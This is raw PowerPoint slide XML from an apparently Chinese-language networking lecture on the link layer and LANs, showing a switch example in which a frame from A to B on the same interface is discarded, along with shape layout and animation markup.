              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s640487" name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64048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63775" y="382587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3" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1633538" y="3503613"/>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4" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2000250" y="3546475"/>
            <a:ext cx="258763" cy="284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5" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2398713" y="3573463"/>
            <a:ext cx="68262" cy="265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6" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="3538538"/>
            <a:ext cx="328613" cy="195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7" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3878263" y="3556000"/>
            <a:ext cx="120650" cy="528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8" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168775" y="3503613"/>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09" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5381625" y="3573463"/>
            <a:ext cx="406400"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0" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5857875" y="3546475"/>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1" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="3476625"/>
            <a:ext cx="487362"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6412" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3905250" y="2176463"/>
            <a:ext cx="509588" cy="252412"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16452" name="Line 27"/>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6453" name="Picture 28"/>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54" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16455" name="Line 30"/>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56" name="Line 31"/>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6413" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2389188" y="2409825"/>
            <a:ext cx="1581150" cy="9699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4" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4117975" y="2401888"/>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5" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4265613" y="2357438"/>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16" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2530475" y="3244850"/>
            <a:ext cx="582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7" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4252913" y="32019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8" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6069013" y="31511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6419" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4368800" y="2016125"/>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6420" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="33035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6421" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646238" y="4076700"/>
            <a:ext cx="328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6422" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="40894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6423" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3114675" y="39100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6424" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4167188"/>
            <a:ext cx="327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6425" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4633913" y="3883025"/>
            <a:ext cx="322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6426" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175250" y="4025900"/>
            <a:ext cx="33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6427" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6038850" y="41021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6428" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="3548063"/>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6429" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6813550" y="2319338"/>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30" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="1970088"/>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431" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="1908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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16432" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7777163" y="2349500"/>
            <a:ext cx="33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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16433" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3527425" y="22479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6434" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3848100" y="2532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6435" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273550" y="24923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16436" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6534150" y="1911350"/>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411704" name="Line 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2352675" y="2365375"/>
            <a:ext cx="1479550" cy="90170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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1670050" y="3395663"/>
            <a:ext cx="901700" cy="449262"/>
            <a:chOff x="1052" y="2139"/>
            <a:chExt cx="568" cy="283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16449" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1052" y="2139"/>
              <a:ext cx="283"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50" name="Line 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1134" y="2248"/>
              <a:ext cx="210" cy="174"/>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51" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1563" y="2239"/>
              <a:ext cx="57" cy="173"/>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1709" name="Line 61"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4456113" y="2036763"/>
            <a:ext cx="2046287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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710" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3556000" y="3454400"/>
            <a:ext cx="279400" cy="174625"/>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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3805238" y="3482975"/>
            <a:ext cx="668337" cy="522288"/>
            <a:chOff x="2397" y="2194"/>
            <a:chExt cx="421" cy="329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16447" name="Line 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2397" y="2285"/>
              <a:ext cx="72" cy="238"/>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48" name="Line 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2698" y="2194"/>
              <a:ext cx="120" cy="19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42" name="Text Box 66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7199313" y="3903663"/>
            <a:ext cx="973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C     1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411715" name="Line 67"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4022725" y="2395538"/>
            <a:ext cx="15875" cy="91281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44" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7197725" y="2351088"/>
            <a:ext cx="420688"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E</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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411717" name="Rectangle 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140575" y="3949700"/>
            <a:ext cx="1117600" cy="363538"/>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411718" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7199313" y="4411663"/>
            <a:ext cx="973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D     2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin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1710"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4117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1715"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4117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1709"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41170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17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17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11704"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41170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11652">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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11652">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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1652">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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11652">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411652">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116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704" grpId="0" animBg="1"/>
      <p:bldP spid="411709" grpId="0" animBg="1"/>
      <p:bldP spid="411710" grpId="0" animBg="1"/>
      <p:bldP spid="411715" grpId="0" animBg="1"/>
      <p:bldP spid="411717" grpId="0" animBg="1"/>
      <p:bldP spid="411718"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43" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6356350"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>链路层和局域网</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18444"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D2D26105-84B3-44A3-93D6-2F22A7B4A716}"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7421" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>交换机举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550863" y="1139825"/>
            <a:ext cx="7772400" cy="4648200"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>发送数据帧到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>会有什么结果呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413700" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="4664075"/>
            <a:ext cx="777240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交换机接收来自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>的数据帧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buChar char="m"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>注意在交换表中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>在交换机的接口</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上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>,B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>也在交换机的接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>数据帧将被交换机丢弃 </a:t>
            </a:r>
